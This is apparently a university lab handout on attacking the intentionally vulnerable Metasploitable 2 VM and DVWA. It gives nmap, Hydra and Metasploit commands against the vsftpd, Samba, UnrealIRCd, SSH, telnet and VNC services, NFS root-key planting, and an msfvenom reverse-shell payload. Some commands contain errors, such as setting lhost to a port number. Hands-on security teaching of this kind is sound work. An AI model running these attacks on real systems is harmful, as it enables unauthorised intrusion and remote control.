Lab 1: Backdoor Attacks

The first Lab on Metasploitable 2 was about the vsftp backdoor, in this Lab we will
discover more attacks and exploitations. The first step towards doing what we want to achieve is
a service scan that looks at all the 65535 ports of Metasploitable 2 to see what’s running where
and with what version.

nmap -p- -sV 10.10.1.10

Exercise 1: Exploiting Port 21: FTP

We have all our ports and services listed now, let us start by Exploiting port 21 running FTP.
1. Use Hydra for this. The two wordlists for this operation will have default login names
and passwords.

hydra -L user.txt -P pass.txt 10.10.1.10 ftp

2. Let’s put our findings to use and try to connect using FTP.

ftp 10.10.1.10

3. Using FTP protocol to transfer user.txt and pass.txt to a directory /usr/local/testFiles in

the Metasploitable machine.

Exercise 2: Exploiting VSFTPD 2.3.4

We have exploited the service running on port 21, now we will exploit the particular version of
the FTP service. We will be searching for an exploit for VSFTPD 2.3.4 using Searchsploit.

Searchsploit vsftpd

1. We now have our exploit, let’s get into Metasploit and run it.
2. Use exploit/unix/ftp/vsftpd_234_backdoor. This module exploits a malicious backdoor
that was added to the VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the
most recent information available. This backdoor was removed on July 3rd, 2011.

Backdoor Attacks Lab Pr Meryeme Ayache

 3. Set the RHOST variable to the IP of Metasploitable 2.
4. Run the exploit using the exploit commande.
5. Detect the current user and use the ifconfig command to make sure that you have
successfully exploited the attack.

Exercise 3: Exploiting Port 22 SSH

Metasploit has an auxiliary function that we will use on the SSH service running on port 22. One
we get our session through it we will be upgrading it to Meterpreter.
1. Run msfconsole and use auxiliary/scanner/ssh/ssh_login. This module will test
ssh logins on a range of machines and report successful logins. If you have loaded a
database plugin and connected to a database this module will record successful logins and
hosts so you can track your access.
2. Set user_file /root/Desktop/user.txt
3. Set pass_file /root/Desktop/pass.txt
4. Execute the auxiliary and detect which command shell is opened.
5. Detect which opened session are available using sessions –u NSession.
6. Detect the opened Meterpreter session and connect to it using sessions NSessions.
7. Detect the current user and use the ifconfig command to make sure that you have
successfully exploited the attack.

Exercise 4: Exploiting port 23 TELNET (Credential Capture)

1. Use Wireshark to capture the TCP traffic, it is set to run in the background while we
connect to Metasploitable 2 through telnet using “msfadmin” as credentials for user name
and password.
2. Use auxiliary/scanner/telnet/telnet_login. This module will test a telnet login on a range
of machines and report successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins and hosts so you can
track your access. The same password and user file from earlier will be used for this.
3. Set RHOSTS 10.10.1.10
4. Set user_file /root/Desktop/user.txt
5. Set pass_file /root/Desktop/pass.txt
6. set stop_on_success true
7. Exploit the vulnerability using the opened Meterpreter session.
8. Use the ifconfig command to make sure that you have successfully exploited the attack.

Backdoor Attacks Lab Pr Meryeme Ayache

 Exercise 5: Exploiting Port 139 & 445 (Samba)
Samba is running on both port 139 and 445, we will be exploiting it using Metasploit. The default
port for this exploit is set to port 139 but it can be changed to port 445 as well.
1. Use exploit/multi/samba/usermap_script
2. Set RHOST 10.10.1.10
3. Run the exploit, then verify the current user and the network configuration.

Exercise 6: Exploiting Port 6667 (IRC)

1. Scan the networl using nmap –sV 10.10.1.10, search for the version of IRC service. It
should be under port 6667.
2. Port 6667 has the Unreal IRCD service running, we will exploit is using a backdoor that’s
available in Metasploit. use exploit/unix/irc/unreal_ircd_3281_backdoor.
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download
archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009
and June 12th, 2010.
3. Run the exploit and execute ifconfig and whoami to proof your exploit.

Exercise 7: Exploiting Port 5900 (VNC)

Virtual Network Computing or VNC service runs on port 5900, this service can be exploited
using a module in Metasploit to find the login credentials.
This module will test a VNC server on a range of machines and report successful logins.
Currently, it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-
response authentication method.
4. Use auxiliary/scanner/vnc/vnc_login
5. Set login 10.10.1.10
6. Exploit you get the password after the login successuful message.
7. Use the provided password to connect to vnc using vncviewer 10.10.1.10

Exercise 8: Privilege Escalation via Port 2049: NFS

In this method, we will be creating an ssh key without a passphrase and exchanging it with the
ssh key of the victim machine for the root user.
First, we use ssh-keygen to generate an RSA keypair without a key phrase, then we place it in the
“/root/.ssh” folder where the key is found by default. Once the key is created and placed, we will
create a directory “/tmp/sshkey/” in our local machine.
The next part is a little tricky, we will be mounting the directory we just made on the victim
machine using the Network File Sharing Function. Once mounted we write the key from our
machine to the victim’s machine, a sort of an override, using the cat command. The thing to keep
in mind here is that the key we have is without a passphrase so the after the override the key in

Backdoor Attacks Lab Pr Meryeme Ayache

 the victim machine is also without a passphrase, so when it is connected using ssh,
it’s using a blank password.
The key is now copied so we unmount the directory and connect as the root user using ssh.

a. showmount -e 192.168.1.103
b. ssh-keygen
c. mkdir /tmp/sshkey
d. mount -t nfs 192.168.1.103:/ /tmp/sshkey/
e. cat ~/ .ssh/id_rsa.pub
f. >>/tmp/sshkey/root/.ssh/authorized_keys
g. umount /tmp/sshkey
h. ssh root@192.168.1.103

Exercise 9: Damn Vulnerable Web App (DVWA)

What is Damn Vulnerable Web App (DVWA)?
 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
vulnerable.
 Its main goals are to be an aid for security professionals to test their skills and tools in a
legal environment, help web developers had better understand the processes of securing
web applications and aid teachers/students to teach/learn web application security in a
classroom environment.
1. Log in into the the DWAV web vulnerabilities using the kali brower and try to exploit
some app vulnerabilities such as SQL injection ou XSS.

Exercise 10: Linux Payload Using Msfvenom

1. Type the following command
msfvenom -p linux/x86/meterpreter/reverse_tcp
lhost=10.10.1.10 lport=4444 -f elf > /root/Desktop/shell
2. Once the payload gets generated send it to the victim to execute on his Linux machine
and start multi handler.
a. msf > use exploit/multi/handler
b. msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
c. msf exploit(handler) > set lhost 10.10.1.10
d. msf exploit(handler) > set lhost 4444
e. msf exploit(handler) > run
3. Once the payload gets executed, it will create a reverse tcp connection on our
metasploitable machine providing us with meterpreter sessions.

Backdoor Attacks Lab Pr Meryeme Ayache